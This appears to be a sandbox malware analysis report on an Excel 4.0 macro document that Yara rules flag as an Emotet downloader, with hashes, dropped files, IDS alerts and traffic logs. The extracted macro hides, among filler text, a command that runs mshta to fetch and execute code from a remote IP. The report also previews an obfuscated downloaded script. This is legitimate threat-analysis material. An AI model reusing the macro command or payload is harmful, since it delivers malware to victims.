Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@25/9@2/36
EGA Information:	Successful, ratio: 71.4%
HDC Information:	Successful, ratio: 18.1% (good quality ratio 17.1%) Quality average: 72% Quality standard deviation: 25.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
TCP Packets have been reduced to 100
Execution Graph export aborted for target mshta.exe, PID 2840 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 3012 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:24:20	API Interceptor	62x Sleep call for process: mshta.exe modified
21:24:24	API Interceptor	441x Sleep call for process: powershell.exe modified
21:24:42	API Interceptor	114x Sleep call for process: rundll32.exe modified

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	557056
Entropy (8bit):	7.0041232632621595
Encrypted:	false
SSDEEP:	6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGOUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTn7yDx6BrWt
MD5:	DF8A5542B86A487AD0C0581E11F0B5EB
SHA1:	170867F21CA9A1B9CACC84336441449BAE0D4911
SHA-256:	69DB5ABABB04BC8A6805647D738E69663ADDACF57AAD0CB9384B60804260A266
SHA-512:	F8E739A1CCBF86AD6B694E4AF44121117373B775C262889F54EFDE52ECC439A358A9C148AD527490FACBA3EDA439F2379CF032B0E36C17CB4324C85C2BA28525
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\QWER.dll, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	downloaded
Size (bytes):	11230
Entropy (8bit):	6.174353476920402
Encrypted:	false
SSDEEP:	192:aYVCkQn+a8Ytu3jBoYwMxsybTH8lNQwAB3fEbMH4+juo8w8q0T1fEnXAdZl+gpX:aYUkNa8ZBoYwMDXH8lNbs8BJZl+WX
MD5:	3CDAF9C34211A5219808433770A34E72
SHA1:	A16F4AC4AF7E46FF84E330BF50A9B6AA6A9A93EC
SHA-256:	CD29D9E79ED2874B6597961173BA7EF09B5F2295CF330BFDAEFF84459EBC58FB
SHA-512:	489E0C619AC80BBE287D8C9C339A11932CB8991EFBD29D536B3D45F9259D325551DF9DC6B1B38DFC4B72051CB05C856C81F9B767CE66A910FE3876927CE657C2
Malicious:	false
IE Cache URL:	http://91.240.118.168/qqw/aas/se.html
Preview:	.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode\|\|document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')\|lI1('per');f9f76c\|=lII;zLP=location.protocol+'0FD';vLG487Q2fbnWb=new Array();d3fUhQBfUW303=new Array();d3fUhQBfUW303[0]='c\161\171R%50%32e%37' ;vLG487Q2fbnWb[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.\\.1.6.6.a.r.%.2.0.%.7

C:\Users\user\AppData\Local\Temp\3DBB.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF33AC78DEA2F7DEBE.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.664554788742027
Encrypted:	false
SSDEEP:	768:YxsINg5+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cML:YY+nBqmIk3hbdlylKsgqopeJBWhZFGk7
MD5:	534B016025B9A11F0776BBE070BC9EBC
SHA1:	23D5520395E4BC1DF6ADE5661554F1DD387DB5CA
SHA-256:	6CE3127C861EB2D24C2CB18AD25C43FB09DC0D15AC4F9C727553C6B30D75BF3D
SHA-512:	09D74BFD0E1422045B40ED37C12EE5380D319F867977725917CE16567012E25562EDDE24E7334073BB59E81DF766501B54A8FD1B9F5D7E66DF9E84BBD57D124D
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD5CC603F304DA47F.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msge (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.58430027744578
Encrypted:	false
SSDEEP:	96:chQCcMqKqvsqvJCwofz8hQCcMqKqvsEHyqvJCworZzIuYnH8UVhxlUVNA2:cizofz8inHnorZzISUVhwA2
MD5:	BBF24C74B986F6F6C20B1E5FDB284B55
SHA1:	7ABC527DFA9B1042FE33CEB2A1E45EDB899283D2
SHA-256:	CDAA6B0B445AB013223918A3E7D6275E7678F7614417671E68168F1800A9781C
SHA-512:	F8DACF2FF7E4A6417858C68BA4FEE02B4917EEA8819188ABF119008269B468F99B00862308DE35ABCB58FDDF86C713CDDDBCA291BC56BA169948D702E2A8202D
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S5S79XMEXB2FN0C1X28V.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.58430027744578
Encrypted:	false
SSDEEP:	96:chQCcMqKqvsqvJCwofz8hQCcMqKqvsEHyqvJCworZzIuYnH8UVhxlUVNA2:cizofz8inHnorZzISUVhwA2
MD5:	BBF24C74B986F6F6C20B1E5FDB284B55
SHA1:	7ABC527DFA9B1042FE33CEB2A1E45EDB899283D2
SHA-256:	CDAA6B0B445AB013223918A3E7D6275E7678F7614417671E68168F1800A9781C
SHA-512:	F8DACF2FF7E4A6417858C68BA4FEE02B4917EEA8819188ABF119008269B468F99B00862308DE35ABCB58FDDF86C713CDDDBCA291BC56BA169948D702E2A8202D
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\80_513972285.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
Category:	dropped
Size (bytes):	77312
Entropy (8bit):	5.8321952104972015
Encrypted:	false
SSDEEP:	1536:mY+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIiQ5gQ72IotO6nitSUPU+82:mY+nBqmIk3hbdlylKsgqopeJBWhZFGk0
MD5:	A018CC966C33496CFF077ABC3DAF17DF
SHA1:	D58C223830595260C541145D65470976089070EF
SHA-256:	463CD2CAF117E08BEC77B0F3FB7A6701F033C178588CDD80B053440B7A4BE474
SHA-512:	A4008612AEDEBAC2DADE1394B498F3822A6AF08BBB693DAD2C29451DDC1EB18CDEBD47D50D4FB93F0278415FBA59156CEC358816FD7AC33C2FD35623C04A8276
Malicious:	true
Yara Hits:	Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\80_513972285.xls, Author: John Lambert @JohnLaTwC Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\80_513972285.xls, Author: Joe Security Rule: INDICATOR_OLE_Excel4Macros_DL2, Description: Detects OLE Excel 4 Macros documents acting as downloaders, Source: C:\Users\user\Desktop\80_513972285.xls, Author: ditekSHen
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.*.h...6..........C.a.l.i.b.r.i. .L.i.g.h.t.

C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda (copy)

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	557056
Entropy (8bit):	7.0041232632621595
Encrypted:	false
SSDEEP:	6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGOUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTn7yDx6BrWt
MD5:	DF8A5542B86A487AD0C0581E11F0B5EB
SHA1:	170867F21CA9A1B9CACC84336441449BAE0D4911
SHA-256:	69DB5ABABB04BC8A6805647D738E69663ADDACF57AAD0CB9384B60804260A266
SHA-512:	F8E739A1CCBF86AD6B694E4AF44121117373B775C262889F54EFDE52ECC439A358A9C148AD527490FACBA3EDA439F2379CF032B0E36C17CB4324C85C2BA28525
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
Entropy (8bit):	5.808717628749656
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	80_513972285.xls
File size:	77726
MD5:	c130bfd7e7632f18fcd505d0991f192f
SHA1:	da0d0031d5f6386f0df623a3c1cabfe4e9778f51
SHA256:	eaad4c93a96bb50a79e024650ae4808afd7fddbd604cbc4048416ddcb20e6aae
SHA512:	e82290b7464a50131ed10a6eb2cae1e1e97cefda42536765347451bfa53d1989613a126dfed99b2a885c0ebba8c7d20f73d6e2737f441a38a70a689dc6e2b026
SSDEEP:	1536:xY+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIiQ5gQ72IotO6nitSUPU+8:xY+nBqmIk3hbdlylKsgqopeJBWhZFGkZ
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "80_513972285.xls"

Indicators

Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary

Code Page:	1251
Author:	xXx
Last Saved By:	xXx
Create Time:	2022-01-26 22:33:31
Last Saved Time:	2022-01-26 22:36:27
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.347239233907
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i m e C a r d . . . . . S h e e t 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . W o r k s h e e
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 fc 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 b8 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.264984368025
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . / . . . . . . @ . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 67009

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	67009
Entropy:	6.37385915268
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c1 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

Name:	Macro1
Type:	3
Final:	False
Visible:	False
Protected:	False
Macro1 3 False 0 False post 1,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.3,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.5,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.7,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.8,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.10,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.12,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.14,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.16,10,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.18,10,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.19,10,=EXEC("cmd /c mshta http://91.240.118.168/qqw/aas/se.html")25,10,=HALT()

Name:	Macro1
Type:	3
Final:	False
Visible:	False
Protected:	False
Macro1 3 False 0 False pre 1,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.3,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.5,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.7,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.8,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.10,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.12,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.14,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.16,10,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.18,10,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.19,10,=EXEC("cmd /c mshta http://91.240.118.168/qqw/aas/se.html")25,10,=HALT()

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/28/22-21:24:47.819865	TCP	2034631	ET TROJAN Maldoc Activity (set)	49168	80	192.168.2.22	91.240.118.168

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 21:24:41.215337992 CET	49167	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:41.276751995 CET	80	49167	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:41.276876926 CET	49167	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:41.280599117 CET	49167	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:41.342339039 CET	80	49167	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:41.342391014 CET	80	49167	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:41.342415094 CET	80	49167	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:41.342437029 CET	80	49167	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:41.342466116 CET	80	49167	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:41.342492104 CET	80	49167	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:41.342505932 CET	49167	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:41.342524052 CET	80	49167	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:41.342539072 CET	49167	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:41.342560053 CET	49167	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:41.342571020 CET	80	49167	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:41.342603922 CET	49167	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:41.342614889 CET	80	49167	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:41.342653036 CET	49167	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:41.342658997 CET	80	49167	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:41.342689037 CET	49167	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:41.348305941 CET	49167	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:47.758677959 CET	49168	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:47.817151070 CET	80	49168	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:47.817209959 CET	49168	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:47.819864988 CET	49168	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:47.878340960 CET	80	49168	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:47.878390074 CET	80	49168	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:47.878407001 CET	80	49168	91.240.118.168	192.168.2.22
Jan 28, 2022 21:24:47.878493071 CET	49168	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:24:47.953516006 CET	49169	80	192.168.2.22	172.67.149.209
Jan 28, 2022 21:24:47.971210003 CET	80	49169	172.67.149.209	192.168.2.22
Jan 28, 2022 21:24:47.971338987 CET	49169	80	192.168.2.22	172.67.149.209
